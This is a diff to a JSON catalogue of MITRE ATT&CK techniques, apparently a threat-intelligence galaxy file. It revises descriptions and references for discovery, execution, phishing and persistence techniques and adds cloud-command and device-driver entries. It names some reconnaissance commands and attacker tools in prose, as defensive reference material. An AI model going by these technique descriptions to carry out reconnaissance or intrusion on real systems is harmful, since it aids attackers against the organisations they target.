+ "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)",
"meta": {
"external_id": "T1069",
"kill_chain": [
@@ -13413,8 +13539,8 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1069",
- "https://capec.mitre.org/data/definitions/576.html",
- "https://kubernetes.io/docs/reference/access-authn-authz/authorization/"
+ "https://kubernetes.io/docs/reference/access-authn-authz/authorization/",
+ "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/"
]
},
"uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
@@ -13648,7 +13774,7 @@
"value": "Credentials in Registry - T1214"
},
{
- "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
+ "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
"meta": {
"external_id": "T1124",
"kill_chain": [
@@ -13660,14 +13786,15 @@
"Process: Process Creation"
],
"mitre_platforms": [
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/",
"https://attack.mitre.org/techniques/T1124",
- "https://capec.mitre.org/data/definitions/295.html",
"https://msdn.microsoft.com/ms724961.aspx",
"https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674",
"https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf"
]
},
@@ -13689,7 +13816,7 @@
"value": "Determine strategic target - T1241"
},
{
- "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\n\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.",
+ "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)",
"meta": {
"external_id": "T1217",
"kill_chain": [
@@ -13706,11 +13833,13 @@
"macOS"
],
"refs": [
- "https://attack.mitre.org/techniques/T1217"
+ "https://attack.mitre.org/techniques/T1217",
+ "https://support.google.com/chrome/a/answer/7349337",
+ "https://www.kaspersky.com/blog/browser-data-theft/27871/"
]
},
"uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
- "value": "Browser Bookmark Discovery - T1217"
+ "value": "Browser Information Discovery - T1217"
},
{
"description": "Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)\n\nProof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)",
@@ -13792,7 +13921,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1133",
- "https://capec.mitre.org/data/definitions/555.html",
"https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac",
"https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
"https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html",
@@ -13837,7 +13965,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1134",
- "https://capec.mitre.org/data/definitions/633.html",
"https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx",
"https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx",
"https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx",
@@ -13850,7 +13977,7 @@
"value": "Access Token Manipulation - T1134"
},
{
- "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ",
+ "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ",
"meta": {
"external_id": "T1531",
"kill_chain": [
@@ -13896,7 +14023,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1135",
- "https://capec.mitre.org/data/definitions/643.html",
"https://en.wikipedia.org/wiki/Shared_resource",
"https://technet.microsoft.com/library/cc770880.aspx"
]
@@ -14170,7 +14296,34 @@
"value": "Spearphishing via Service - T1194"
},
{
- "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\\\SYSVOL\\\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.",
+ "description": "Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)",
+ "meta": {
+ "external_id": "T1651",
+ "kill_chain": [
+ "mitre-attack:execution"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "Process: Process Creation",
+ "Script: Script Execution"
+ ],
+ "mitre_platforms": [
+ "IaaS",
+ "Azure AD"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1651",
+ "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html",
+ "https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview",
+ "https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d",
+ "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/"
+ ]
+ },
+ "uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "value": "Cloud Administration Command - T1651"
+ },
+ {
+ "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.",
"meta": {
"external_id": "T1615",
"kill_chain": [
@@ -14270,9 +14423,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1195",
"https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
- "https://capec.mitre.org/data/definitions/437.html",
- "https://capec.mitre.org/data/definitions/438.html",
- "https://capec.mitre.org/data/definitions/439.html",
"https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/",
"https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf",
"https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E",
@@ -14967,7 +15117,7 @@
"value": "Implant Internal Image - T1525"
},
{
- "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)",
+ "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable Cloud Logs](https://attack.mitre.org/techniques/T1562/008).",
"meta": {
"external_id": "T1526",
"kill_chain": [
@@ -14994,6 +15144,37 @@
"uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db",
"value": "Cloud Service Discovery - T1526"
},
+ {
+ "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)",
+ "meta": {
+ "external_id": "T1652",
+ "kill_chain": [
+ "mitre-attack:discovery"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "Process: OS API Execution",
+ "Process: Process Creation",
+ "Windows Registry: Windows Registry Key Access"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1652",
+ "https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys",
+ "https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery",
+ "https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers",
+ "https://linux.die.net/man/8/modinfo",
+ "https://man7.org/linux/man-pages/man8/lsmod.8.html",
+ "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"
+ ]
+ },
+ "uuid": "215d9700-5881-48b8-8265-6449dbb7195d",
+ "value": "Device Driver Discovery - T1652"
+ },
{
"description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. \n\nThere are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.",
"meta": {
@@ -16018,6 +16199,7 @@
"Process: Process Access",
"User Account: User Account Authentication",
"User Account: User Account Modification",
+ "Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification"
],
"mitre_platforms": [
@@ -16109,7 +16291,7 @@
"value": "Search Closed Sources - T1597"
},
{
- "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
+ "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)",
"meta": {
"external_id": "T1598",
"kill_chain": [
@@ -16125,12 +16307,17 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1598",
+ "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
"https://github.com/ryhanson/phishery",
"https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/",
"https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/",
+ "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/",
+ "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
+ "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",
"https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages",
+ "https://www.proofpoint.com/us/threat-reference/email-spoofing",
"https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
]
},
@@ -16191,7 +16378,7 @@
"value": "At (Linux) - T1053.001"
},
{
- "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
+ "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
"meta": {
"external_id": "T1553.005",
"kill_chain": [
@@ -16317,7 +16504,7 @@
"value": "One-Way Communication - T1102.003"
},
{
- "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+ "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:\n\n* Inserting malicious scripts into web pages or other user controllable web content such as forum posts\n* Modifying script files served to websites from publicly writeable cloud storage buckets\n* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n\nIn addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
"meta": {
"external_id": "T1608.004",
"kill_chain": [
@@ -16455,7 +16642,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/002",
- "https://capec.mitre.org/data/definitions/641.html",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf"
]
},
@@ -16712,7 +16898,7 @@
"value": "Re-opened Applications - T1164"
},
{
- "description": "Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
+ "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)",
"meta": {
"external_id": "T1571",
"kill_chain": [
@@ -16730,6 +16916,7 @@
"refs": [
"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
"https://attack.mitre.org/techniques/T1571",
+ "https://twitter.com/TheDFIRReport/status/1498657772254240768",
"https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
]
@@ -16798,7 +16985,7 @@
"value": "Multi-hop Proxy - T1188"
},
{
